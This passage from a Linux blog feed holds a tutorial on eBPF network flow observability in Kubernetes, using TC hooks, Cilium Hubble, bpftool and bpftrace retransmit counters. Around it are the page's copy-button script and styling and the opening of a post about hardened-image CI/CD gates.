  // Legacy copy path: select the text in an off-screen textarea and run the
  // "copy" command. The textarea is always removed again, and success is only
  // reported when execCommand actually returned true.
  function fb(text,btn){
    var ta=null,copied=false;
    try{
      ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      // execCommand signals an unsupported/disabled command by returning false, not by throwing.
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    finally{
      if(ta&&ta.parentNode)ta.parentNode.removeChild(ta);
    }
    if(copied){ok(btn);}else{failed(btn);}
  }
  // Run now if the DOM is already parsed, otherwise wait for DOMContentLoaded.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 10</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <strong>Network Flow Observability</strong> · <a href="/ebpf-dns-observability-kubernetes/">DNS Observability</a></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img decoding="async" width="605" height="2560" src="https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-scaled.png" alt="eBPF Network Flow Observability — Hubble and Cilium architecture for zero-instrumentation flow monitoring" class="wp-image-2119" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-scaled.png 605w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-71x300.png 71w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-242x1024.png 242w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-768x3249.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-363x1536.png 363w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-484x2048.png 484w" sizes="(max-width: 605px) 100vw, 605px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">Hubble captures every packet decision at the eBPF layer — no sidecar, no app changes, no sampling.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Network flow observability with eBPF attaches persistent programs to TC hooks and records every connection attempt, retransmit, reset, and drop — continuously, with no sampling<br />
  <em>(TC hook = Traffic Control hook: the point in the Linux network stack where eBPF programs intercept packets after ingress or before egress, tied to a specific network interface)</em></li>
<li>APM tools and service mesh telemetry are interpretations of what happened; kernel-level flow data from TC hooks is the raw event stream they all derive from</li>
<li>Retransmit counters at the kernel level reveal congestion, half-open connections, and remote endpoint failures that application logs never surface</li>
<li>Cilium&#8217;s Hubble and similar tools (Pixie, Retina) are eBPF flow exporters — they run TC programs, collect <code class="" data-line="">perf_event</code> or <code class="" data-line="">ringbuf</code> events, and expose them over an API</li>
<li>You can verify what flow data a tool is actually collecting with four <code class="" data-line="">bpftool</code> commands — without reading documentation</li>
<li>Production caution: flow maps grow with the number of active connections; pin and bound your maps, and account for the per-packet overhead on high-throughput interfaces</li>
</ul>
<hr />
<p>EP09 showed bpftrace as an on-demand kernel query tool — compile a question, get an answer, clean up. Network flow observability with eBPF is the persistent version: programs that stay attached to TC hooks across your entire fleet, recording every connection without waiting for you to ask. When a client reports intermittent failures that appear nowhere in application logs, that persistent record is what you query. This episode covers how that layer works and how to read it.</p>
<h2 id="quick-check-what-flow-data-is-your-cluster-already-collecting">Quick Check: What Flow Data Is Your Cluster Already Collecting?</h2>
<p>Before building anything new, check what&#8217;s already running. If you have Cilium, Pixie, or Retina on your cluster, eBPF flow programs are already attached:</p>
<pre><code class="" data-line=""># SSH into a worker node, then:

# What TC programs are attached to cluster interfaces?
bpftool net list

# Expected output on a Cilium node:
# xdp:
#
# tc:
# eth0(2) clsact/ingress prog_id 38 prio 1 handle 0x1 direct-action
# eth0(2) clsact/egress  prog_id 39 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/ingress prog_id 41 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/egress  prog_id 42 prio 1 handle 0x1 direct-action
</code></pre>
<pre><code class="" data-line=""># What maps are those programs holding state in?
# bpftool prints two lines per map, so -A1 keeps the key/value/max_entries line;
# the _ct alternative matches Cilium conntrack maps such as cilium_ct4_global.
bpftool map list | grep -E -A1 &quot;flow|conn|_ct|sock|nat&quot;

# Sample output:
# 24: hash  name cilium_ct4_global  flags 0x0
#     key 24B  value 56B  max_entries 65536  memlock 4718592B
# 25: hash  name cilium_ct4_local   flags 0x0
#     key 24B  value 56B  max_entries 8192   memlock 589824B
</code></pre>
<p>Each <code class="" data-line="">lxcXXXX</code> interface is the host-side end of a pod&#8217;s veth pair. The TC programs on those interfaces are what Cilium uses to enforce NetworkPolicy and collect flow telemetry. If you see <code class="" data-line="">prog_id</code> values on pod interfaces, your cluster is already doing kernel-level flow collection.</p>
<blockquote>
<p><strong>Not running Cilium?</strong> On a plain kubeadm or EKS node without a CNI that uses eBPF, <code class="" data-line="">bpftool net list</code> will show no TC programs on pod interfaces — just whatever kube-proxy or the CNI plugin installed. You can still attach your own flow programs with <code class="" data-line="">tc qdisc add dev eth0 clsact</code> — that&#8217;s the starting point this episode covers.</p>
</blockquote>
<hr />
<p>The client opened a ticket on a Tuesday afternoon. &#8220;Intermittent connection failures to the payment gateway. Started around 11 AM. Application logs say timeout. Retry logic is masking it for most users but the error rate is up 0.3%.&#8221;</p>
<p>I looked at the APM dashboard. The service showed elevated latency — p99 at 850ms versus a normal 120ms — but no hard errors at the application layer. The service mesh metrics showed the downstream call succeeding from the mesh&#8217;s perspective. The payment gateway team said their side looked clean.</p>
<p>Three tools. Three different answers. All of them interpreting the network. None of them were the network.</p>
<p>I ran:</p>
<pre><code class="" data-line="">bpftool map dump id 24 | grep -A5 &quot;payment-gateway-ip&quot;
</code></pre>
<p>The connection tracking map showed a retransmit count of 14 for a specific <code class="" data-line="">(src_ip, dst_ip, src_port, dst_port, protocol)</code> tuple — the same 5-tuple, every 30 seconds, for 2 hours. The kernel was retransmitting. The TCP stack was compensating. The application was seeing sporadic success because retransmits eventually got through. The APM dashboard averaged that latency into a p99 and called it &#8220;elevated.&#8221;</p>
<p>The kernel had the truth. Everything above it was rounding.</p>
<hr />
<h2 id="why-application-level-metrics-miss-what-the-kernel-sees">Why Application-Level Metrics Miss What the Kernel Sees</h2>
<p>Application metrics — APM spans, service mesh telemetry, load balancer health checks — operate at Layer 7. They measure round-trip time for complete requests, error codes returned, bytes transferred. They answer &#8220;did this request succeed?&#8221; not &#8220;what did the network do to make it succeed?&#8221;</p>
<p>The TCP stack underneath those requests handles retransmits, congestion window adjustments, RST packets, and half-open connections silently. From an application&#8217;s perspective, a request that required 3 retransmits before the ACK arrived looks identical to one that succeeded on the first attempt — slightly slower, but successful.</p>
<p>This is structural, not a tooling gap. Application-layer observability tools cannot see below their own protocol boundary. The kernel&#8217;s TCP implementation does not report upward when it retransmits. It just retransmits.</p>
<p>eBPF flow observability closes this gap by attaching programs directly to the network path — at the TC hook, which fires on every packet crossing a network interface — and recording what the kernel actually does.</p>
<hr />
<h2 id="how-tc-hook-flow-programs-work">How TC Hook Flow Programs Work</h2>
<p>EP08 covered TC eBPF programs for pod network policy. Flow observability uses the same attachment point with a different purpose: instead of allowing or dropping packets, the program reads packet metadata and writes it to a map or ring buffer.</p>
<pre><code class="" data-line="">Pod sends packet
      ↓
veth interface (lxcXXXX)
      ↓
TC clsact/egress hook fires
      ↓
eBPF program reads:
  - src IP, dst IP
  - src port, dst port
  - protocol
  - packet size
  - TCP flags (SYN, ACK, FIN, RST) and sequence number (a repeated sequence number indicates a retransmit)
      ↓
Writes event to ringbuf (or perf_event_array)
      ↓
Userspace consumer reads ringbuf
      ↓
Aggregates to flow record
      ↓
Exports to Hubble/Prometheus/flow store
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">ringbuf</code></strong> — a BPF ring buffer: a memory-efficient, multi-producer/single-consumer queue shared between kernel eBPF programs and a userspace consumer. The kernel program writes events; the userspace reader drains them. Used instead of <code class="" data-line="">perf_event_array</code> in kernel 5.8+ because a single buffer shared across all CPUs avoids per-CPU memory waste and preserves event ordering. When you see Hubble exporting flows, it&#8217;s reading from a ringbuf that the TC program writes to.</p>
</blockquote>
<p>The key structural property: the TC hook fires on every packet. Not sampled. Not throttled by default. Every SYN, every ACK, every RST, every retransmit. For flow observability, you typically aggregate at the program level — count packets and bytes per 5-tuple per second, rather than emitting an event per packet — but the raw visibility is there if you need it.</p>
<hr />
<h2 id="what-retransmit-telemetry-actually-reveals">What Retransmit Telemetry Actually Reveals</h2>
<p>Most flow observability implementations track TCP retransmits specifically because they are the clearest signal of network-layer trouble invisible to applications.</p>
<p>A TCP retransmit happens when a sender doesn&#8217;t receive an ACK within the retransmission timeout (RTO). The kernel resends the segment and doubles the timeout (exponential backoff). From the application&#8217;s perspective, the call takes longer. If retransmits keep clearing, the application sees success — just slow success.</p>
<blockquote>
<p><strong><code class="" data-line="">perf_event</code></strong> — a kernel mechanism for collecting performance data. In eBPF, <code class="" data-line="">BPF_MAP_TYPE_PERF_EVENT_ARRAY</code> lets kernel programs push variable-length records to userspace readers via a ring buffer per CPU. Older tools use <code class="" data-line="">perf_event_array</code>; newer ones use <code class="" data-line="">BPF_MAP_TYPE_RINGBUF</code> (single shared ring, more efficient). If you inspect an older version of Cilium&#8217;s flow exporter, you&#8217;ll see <code class="" data-line="">perf_event</code> writes; newer versions use <code class="" data-line="">ringbuf</code>.</p>
</blockquote>
<p>To observe retransmits directly with bpftrace:</p>
<pre><code class="" data-line=""># Count retransmit events per destination IP — run for 60 seconds
# Single-argument ntop() infers IPv4 from the 4-byte skc_daddr, so the one-liner
# does not depend on the AF_INET macro (which would need a socket.h include).
bpftrace -e &#039;
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop($sk-&gt;__sk_common.skc_daddr);
    @retransmits[$daddr] = count();
}
interval:s:60 { print(@retransmits); clear(@retransmits); exit(); }
&#039;
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">Attaching 2 probes...
@retransmits[10.96.0.10]:   2       # DNS service — normal
@retransmits[172.16.4.23]:  847     # payment gateway endpoint ← problem here
@retransmits[10.244.1.5]:   1       # normal pod-to-pod traffic
</code></pre>
<p>847 retransmits to a single endpoint in 60 seconds. That&#8217;s not noise. That&#8217;s a congested or half-open connection being retried 14 times per second by the TCP stack while the application layer averages it into &#8220;elevated latency.&#8221;</p>
<hr />
<h2 id="how-cilium-hubble-collects-flow-data">How Cilium Hubble Collects Flow Data</h2>
<p>Hubble is the flow observability layer built into Cilium. Understanding how it works makes you able to reason about what it can and cannot see — and how to verify what it&#8217;s actually collecting.</p>
<p>Hubble&#8217;s architecture:</p>
<pre><code class="" data-line="">Kernel (per node)
├── TC eBPF programs on all pod veth interfaces
│     write flow events → BPF ringbuf
│
└── Hubble node agent (userspace)
      reads ringbuf
      enriches with pod metadata (Kubernetes API)
      exposes gRPC API

Cluster level
└── Hubble Relay
      aggregates per-node gRPC streams
      exposes single cluster-wide API

User tooling
└── hubble observe  /  Hubble UI  /  Prometheus exporter
</code></pre>
<p>The TC programs are writing raw packet events. The Hubble agent is the consumer that translates those events into Kubernetes-aware flow records — adding pod name, namespace, label, and policy verdict on top of the 5-tuple and TCP metadata the kernel provides.</p>
<p>To see what Hubble&#8217;s TC programs have attached:</p>
<pre><code class="" data-line=""># On any Cilium node
bpftool net list | grep lxc

# lxce4a1(23) clsact/ingress prog_id 61  ← Hubble flow program on pod interface ingress
# lxce4a1(23) clsact/egress  prog_id 62  ← Hubble flow program on pod interface egress
# lxcf7b2(31) clsact/ingress prog_id 63
# lxcf7b2(31) clsact/egress  prog_id 64
</code></pre>
<pre><code class="" data-line=""># Inspect one of those programs to confirm it&#039;s reading flow metadata
bpftool prog show id 61

# Output:
# 61: sched_cls  name tail_handle_nat  tag 3a8e2f1b4c7d9e0a  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 2144B  jited 1382B  memlock 4096B  map_ids 24,31,38
#     btf_id 142
</code></pre>
<p><code class="" data-line="">sched_cls</code> is the BPF program type for TC — confirming these are TC-attached flow programs. <code class="" data-line="">map_ids 24,31,38</code> — those are the maps this program reads from and writes to. You can dump any of them:</p>
<pre><code class="" data-line="">bpftool map dump id 24 | head -40

# Output (connection tracking entry):
# [{
#     &quot;key&quot;: {
#         &quot;saddr&quot;: &quot;10.244.1.5&quot;,        # ← source pod IP
#         &quot;daddr&quot;: &quot;172.16.4.23&quot;,        # ← destination IP
#         &quot;sport&quot;: 48291,                # ← source port
#         &quot;dport&quot;: 443,                  # ← destination port
#         &quot;nexthdr&quot;: 6,                  # ← protocol: TCP
#         &quot;flags&quot;: 3                     # ← CT_EGRESS | CT_ESTABLISHED
#     },
#     &quot;value&quot;: {
#         &quot;rx_packets&quot;: 14832,           # ← packets received
#         &quot;tx_packets&quot;: 14831,           # ← packets sent
#         &quot;rx_bytes&quot;: 3841024,           # ← bytes received
#         &quot;tx_bytes&quot;: 3756288,           # ← bytes sent
#         &quot;lifetime&quot;: 21600,             # ← seconds until entry expires
#         &quot;rx_closing&quot;: 0,
#         &quot;tx_closing&quot;: 0
#     }
# }]
</code></pre>
<p>That&#8217;s the ground truth. Not an APM span. Not a service mesh metric. The actual per-connection counters the kernel is maintaining for that 5-tuple.</p>
<hr />
<h2 id="writing-a-minimal-flow-observer-with-bpftrace">Writing a Minimal Flow Observer with bpftrace</h2>
<p>You don&#8217;t need Cilium or Hubble to get flow telemetry. bpftrace can produce it directly on any node with BTF:</p>
<pre><code class="" data-line=""># Persistent flow table: connections + send-call counts, printed every 30s for 2 minutes
# Single-argument ntop() infers IPv4 from the 4-byte skc_daddr, so the one-liner
# does not depend on the AF_INET macro (which would need a socket.h include).
bpftrace -e &#039;
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop($sk-&gt;__sk_common.skc_daddr);
    // skc_dport is stored big-endian (network order); swap the two bytes to get the real port
    $p = $sk-&gt;__sk_common.skc_dport;
    $dport = (($p &amp; 0xff) &lt;&lt; 8) | ($p &gt;&gt; 8);
    @flows[comm, $daddr, $dport] = count();
}
interval:s:30 { print(@flows); clear(@flows); }
// stop after 2 minutes from inside the program
interval:s:120 { exit(); }
&#039;
</code></pre>
<p>Sample output (every 30 seconds):</p>
<pre><code class="" data-line="">@flows[curl, 93.184.216.34, 443]:         12    # curl → example.com:443
@flows[coredns, 10.96.0.10, 53]:          341   # CoreDNS upstream queries
@flows[payment-svc, 172.16.4.23, 443]:   1204   # payment service → gateway
@flows[nginx, 10.244.2.3, 8080]:          89    # nginx → upstream pod
</code></pre>
<p>For retransmit tracking specifically:</p>
<pre><code class="" data-line=""># Combined flow + retransmit watcher — runs until Ctrl-C
# Single-argument ntop() infers IPv4 from the 4-byte skc_daddr, so the one-liner
# does not depend on the AF_INET macro (which would need a socket.h include).
bpftrace -e &#039;
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop($sk-&gt;__sk_common.skc_daddr);
    // comm is whatever task is on-CPU when the retransmit fires; it may not be the socket owner
    @retx[comm, $daddr] = count();
}
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop($sk-&gt;__sk_common.skc_daddr);
    @sends[comm, $daddr] = count();
}
interval:s:10 {
    printf(&quot;=== Retransmit ratio (last 10s) ===\n&quot;);
    print(@retx);
    print(@sends);
    clear(@retx);
    clear(@sends);
}
&#039;
</code></pre>
<p>This gives you both the volume of sends and the retransmit count side by side — the ratio tells you whether retransmits are a rounding error (0.01%) or a signal (5%+).</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Map size bounds matter.</strong> Connection tracking maps default to tens of thousands of entries. On nodes with high connection churn (serverless, short-lived batch jobs), maps can fill and start dropping new entries silently. Check <code class="" data-line="">bpftool map show id N</code> for <code class="" data-line="">max_entries</code> and monitor map utilization. Cilium exposes this as <code class="" data-line="">cilium_bpf_map_pressure</code> in Prometheus.</p>
<p><strong>Per-packet overhead on high-throughput interfaces.</strong> A TC program that fires on every packet on a 10Gbps interface processes millions of packets per second. Aggregating at the program level (count per 5-tuple rather than emit per packet) keeps overhead manageable — Cilium does this. A naive bpftrace one-liner that emits a perf event per packet will saturate the perf ring buffer under real load. Use <code class="" data-line="">ringbuf</code> write paths or aggregate before emitting.</p>
<p><strong>TC hook placement and direction confusion.</strong> Ingress TC on a pod&#8217;s veth (lxcXXXX) sees egress traffic from the pod&#8217;s perspective — because the host sees the packet arriving on the veth after the pod sent it. This reversal is consistent but confusing when you&#8217;re reading direction labels in flow records. EP08 covered this in detail for policy enforcement; the same asymmetry applies to flow data.</p>
<p><strong>Retransmit counters reset on connection close.</strong> If you&#8217;re tracking retransmit totals for a long-lived connection, the count is stored in the kernel&#8217;s socket state and is cleared when the socket closes. For persistent tracking across reconnects, aggregate at the flow level in userspace before the connection closes.</p>
<p><strong>Hubble flow visibility requires pod interfaces.</strong> Hubble only sees traffic that crosses a pod&#8217;s veth interface. Node-to-node traffic that doesn&#8217;t involve a pod (e.g., node SSH, kubelet-to-API-server on the node IP) is not captured by default. For host-level network observability, you need a TC program on the physical interface (<code class="" data-line="">eth0</code>, <code class="" data-line="">ens3</code>), not just on pod veth pairs.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want to see</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>What TC programs are attached</td>
<td><code class="" data-line="">bpftool net list</code></td>
</tr>
<tr>
<td>Which maps a program uses</td>
<td><code class="" data-line="">bpftool prog show id N</code> (check <code class="" data-line="">map_ids</code>)</td>
</tr>
<tr>
<td>Connection tracking entries</td>
<td><code class="" data-line="">bpftool map dump id N</code></td>
</tr>
<tr>
<td>Retransmits per destination</td>
<td><code class="" data-line="">bpftrace -e &#039;kprobe:tcp_retransmit_skb { ... }&#039;</code></td>
</tr>
<tr>
<td>Flow counts per process</td>
<td><code class="" data-line="">bpftrace -e &#039;kprobe:tcp_sendmsg { @[comm, daddr] = count(); }&#039;</code></td>
</tr>
<tr>
<td>Hubble flow stream (Cilium)</td>
<td><code class="" data-line="">hubble observe --follow</code></td>
</tr>
<tr>
<td>Hubble flows for one pod</td>
<td><code class="" data-line="">hubble observe --pod mynamespace/mypod --follow</code></td>
</tr>
<tr>
<td>Verify map pressure</td>
<td><code class="" data-line="">bpftool map show id N</code> (check <code class="" data-line="">max_entries</code> vs entries)</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Kernel function</th>
<th>What it marks</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">tcp_sendmsg</code></td>
<td>Data being sent on a TCP socket</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_recvmsg</code></td>
<td>Data being received on a TCP socket</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_retransmit_skb</code></td>
<td>A segment being retransmitted</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_send_reset</code></td>
<td>RST being sent</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_fin</code></td>
<td>FIN received from the peer (remote side closing the connection)</td>
</tr>
<tr>
<td><code class="" data-line="">tcp_connect</code></td>
<td>New outbound TCP connection attempt</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Network flow observability with eBPF attaches TC programs that record every connection event continuously — not sampled, not throttled, not filtered by what the application reports</li>
<li>Retransmit telemetry from <code class="" data-line="">tcp_retransmit_skb</code> reveals congestion and endpoint failures that are structurally invisible to application-layer monitoring tools</li>
<li>Cilium Hubble, Pixie, and Retina are all eBPF flow exporters — they run TC programs, drain a ringbuf, enrich with Kubernetes metadata, and expose the result over an API</li>
<li>You can verify what any flow tool is actually collecting with <code class="" data-line="">bpftool net list</code>, <code class="" data-line="">bpftool prog show</code>, <code class="" data-line="">bpftool map list</code>, and <code class="" data-line="">bpftool map dump</code> — four commands, no documentation needed</li>
<li>Map sizing and per-packet overhead are the two production concerns; aggregate at the kernel level, bound your maps, and monitor map pressure</li>
<li>The kernel&#8217;s connection tracking map is the ground truth. APM dashboards, service mesh metrics, and load balancer health checks are all interpretations of what that map contains</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>Flow observability tells you what connections exist. EP11 goes one level deeper: what names your pods are resolving those connections to. DNS is where a compromised workload first reveals itself — it queries a domain that has no business being queried from a production pod, and if you&#8217;re not watching the kernel-level DNS path, you won&#8217;t see it until after the damage.</p>
<p>DNS observability at the kernel level uses tracepoint hooks on the DNS syscall path — the same ground-truth approach as flow telemetry, but for name resolution: every query, every response, tied to the pod that made it, without deploying a sidecar.</p>
<p><em>Next: <a href="/dns-kernel-observability/">DNS observability at the kernel level — what your pods are actually resolving</a></em></p>
<p>Get EP11 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&amp;linkname=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-network-flow-observability%2F&#038;title=Network%20Flow%20Observability%20%E2%80%94%20What%20Every%20Connection%20Reveals" data-a2a-url="https://linuxcent.com/ebpf-network-flow-observability/" data-a2a-title="Network Flow Observability — What Every Connection Reveals"></a></p><p>The post <a href="https://linuxcent.com/ebpf-network-flow-observability/">Network Flow Observability — What Every Connection Reveals</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-network-flow-observability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1838</post-id>	</item>
		<item>
		<title>The Pipeline Gate — Hardened Images as a CI/CD Build Constraint</title>
		<link>https://linuxcent.com/hardened-image-cicd-pipeline-gate/</link>
					<comments>https://linuxcent.com/hardened-image-cicd-pipeline-gate/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sat, 23 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[OS Image Builder]]></category>
		<category><![CDATA[CI/CD]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[GitOps]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pipeline]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stratum]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1831</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span>Make hardened OS images a CI/CD build constraint: POST /api/pipeline/scan fails the build if grade &lt; threshold. Unhardened images never reach production.
</p>
<p>The post <a href="https://linuxcent.com/hardened-image-cicd-pipeline-gate/">The Pipeline Gate — Hardened Images as a CI/CD Build Constraint</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel with a coloured left border; position:relative anchors the absolutely positioned badge and copy button. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested inside pre inherits the panel styling instead. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border colour keyed on the data-lang attribute of the pre element. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned top-right, invisible until the block is hovered; .copied is the success state. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: pinned top-left, non-interactive, also revealed on hover. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Tables: full-width, bordered cells, shaded header, zebra-striped rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Decorate every pre element on the page: record its language in data-lang,
  // add a hover language badge, and append a Copy button wired to the clipboard.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      // The language comes from a "language-xxx" class on the inner code element, when present.
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text;
        if(code){text=code.innerText;}
        else{
          // No inner code element: read the pre itself, but from a clone with the injected
          // button/badge stripped, so their labels are not copied along with the snippet.
          var bare=pre.cloneNode(true);
          bare.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
          text=bare.textContent;
        }
        // Prefer the async Clipboard API (secure contexts only); otherwise use the textarea fallback.
